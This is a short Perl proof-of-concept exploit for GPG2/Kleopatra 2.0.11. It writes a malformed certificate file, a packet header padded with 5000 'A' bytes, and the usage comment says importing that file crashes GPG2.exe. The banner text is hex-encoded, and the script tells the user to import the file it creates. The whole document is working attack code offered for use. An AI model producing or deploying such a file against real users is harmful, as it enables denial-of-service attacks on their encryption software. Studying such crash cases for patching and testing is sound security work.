#!/usr/bin/perl

# GPG2/Kleopatra 2.0.11 - Malformed Certificate Crash PoC
# Exploit based on Dr_IDE.
# Tested on: 7RC, XPSP3
#
# Coded by Oscar Marques aka F-117.
# www.dunkelheit.com.br
# 22/10/09.
# Exploit usage: Generate cert, import it into Kleopatra, GPG2.exe crashes.
#
# md5: 763c0e9bdf0ad333828193fbf45204fe  gpg2_evil_cert.gpg

my $VERSAO = '0.1';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

$buffer= "\x99\x03\x2E\x04\x4A\xDC\xA8\x29\x11\x08\x20".
"\x41" x 5000;

sub banner {
print ("\x47\x50\x47\x32\x2f\x4b\x6c\x65\x6f\x70\x61\x74\x72\x61\x20\x32\x2e\x30\x2e\x31\x31\x20\x2d\x20\x4d\x61\x6c\x66\x6f\x72\x6d\x65\x64\x20\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x65\x20\x43\x72\x61\x73\x68\x20\x50\x6f\x43\n\x43\x6f\x64\x65\x64\x20\x62\x79\x20\x46\x2d\x31\x31\x37\x2e\n\n");
}

{
banner();
open(FILE, ">gpg2_evil_cert.gpg");
print FILE $buffer;
close(FILE); 
print("[+] File created successfully. Import it.\n");
}